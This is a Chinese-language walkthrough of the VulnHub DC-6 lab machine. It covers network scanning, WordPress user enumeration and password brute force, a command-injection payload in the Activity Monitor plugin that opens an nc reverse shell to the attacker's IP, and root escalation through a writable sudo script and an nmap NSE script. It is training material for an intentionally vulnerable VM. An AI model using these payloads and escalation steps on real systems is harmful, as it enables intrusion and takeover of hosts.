DC-6靶机

一.环境搭建

1.下载地址

靶机下载地址:https://download.vulnhub.com/dc/DC-6.zip

2.虚拟机配置

设置网络为nat模式,启动打开时,发现错误直接重试和点是

打开靶机虚拟机,如下图所示即为正常

二.开始渗透

1.信息收集

查找与攻击机(kali)同一网段的靶机ip

arp-scan -l

可以看到靶机ip为192.168.111.134,攻击机(kali)ip 为192.168.111.128

用nmap查看开放端口以及开放服务

nmap -p- -sV 192.168.111.134

开放了一个http和ssh服务,用浏览器打开http服务,发现无法访问,和之前一样,去修改dns文件

linux:
vim /etc/hosts
windows:
C:\Windows\System32\drivers\etc

添加如下的内容

192.168.111.134 wordy

用浏览器打开,得到如下界面,以及提示是wordpress

用whatweb查看一下具体信息

whatweb -v http://192.168.111.134

得知信息为word press和apache搭建的网站,用wpscan来扫描一下用户

wpscan --url http://wordy/ --enumerate u

发现如下用户名

将其保存在usernames.txt中,方便后续爆破

看了大佬的wp,发现提示写在人家官网

DC: 6 ~ VulnHub

cat /usr/share/wordlists/rockyou.txt | grep k01 > password.txt

对用户进行账号密码爆破

wpscan --url http://wordy/ -U usernames.txt -P password.txt

显示有六个用户存粹是我多复制了一下,不用在意这个

2.登录后台

看到用户名mark/helpdesk01,进行账户登录

登录地址(wordpress的后台地址,信息搜集,目录扫描,都做到这里了,不再做演示)

http://wordy/wp-admin/

侧边栏里面有个activity monitor插件, 去漏洞库搜一下这个插件是否有漏洞

WordPress Plugin Plainview Activity Monitor 20161228 - (Authenticated) Command Injection - PHP webapps Exploit

下面有利用方法

3.漏洞利用

漏洞利用地址如下

http://wordy/wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools

命令注入,打开bp进行抓包,在ip那一栏填上一个网址,点击lookup

拼接如下命令

baidu.com | nc -e /bin/bash 192.168.111.128 4444

在kali端开启监听

nc -lvvp 4444

4.获取shell

得到如下shell

用python启一个交互式shell

python -c 'import pty;pty.spawn("/bin/bash")'

进入到home目录下,发现提示

cd /home/mark/stuff

进行ssh登录,graham/GSo7isUM1D4

ssh graham@192.168.111.134

5.进行提权

利用suid,发现没有可以利用的地方

查看当前用户可执行操作

sudo -l

发现可操作/home/jens/backups.sh,打开发现是一个解压的脚本

cat /home/jens/backups.sh

向这个脚本写入命令,让jens这个用户来执行

echo "/bin/bash" >> /home/jens/backups.sh

sudo -u jens /home/jens/backups.sh

已经切换到jens用户,查看这个用户可以执行的命令

看到一个nmap,需要nmap打开一个shell即可获得root权限

nmap中执行shell方法

echo "os.execute('/bin/bash')">/tmp/shell.nse

sudo nmap --script=/tmp/shell.nse

不知道为什么,我这个shell不会显示我自己打的命令,所以需要自己盲打

cd /root
cat theflag.txt

最终成功获得root权限

相关推荐
独行soc1 小时前
#渗透测试#漏洞挖掘#红蓝攻防#护网#sql注入介绍08-基于时间延迟的SQL注入(Time-Based SQL Injection)
数据库·sql·安全·渗透测试·漏洞挖掘
Clockwiseee2 小时前
php伪协议
windows·安全·web安全·网络安全
黑客Ash2 小时前
安全算法基础(一)
算法·安全
云云3212 小时前
搭建云手机平台的技术要求?
服务器·线性代数·安全·智能手机·矩阵
云云3213 小时前
云手机有哪些用途?云手机选择推荐
服务器·线性代数·安全·智能手机·矩阵
xcLeigh3 小时前
网络安全 | 防火墙的工作原理及配置指南
安全·web安全
白乐天_n3 小时前
腾讯游戏安全移动赛题Tencent2016A
安全·游戏
安全小王子4 小时前
Kali操作系统简单介绍
网络·web安全
光路科技5 小时前
八大网络安全策略:如何防范物联网(IoT)设备带来的安全风险
物联网·安全·web安全
saynaihe5 小时前
安全地使用 Docker 和 Systemctl 部署 Kafka 的综合指南
运维·安全·docker·容器·kafka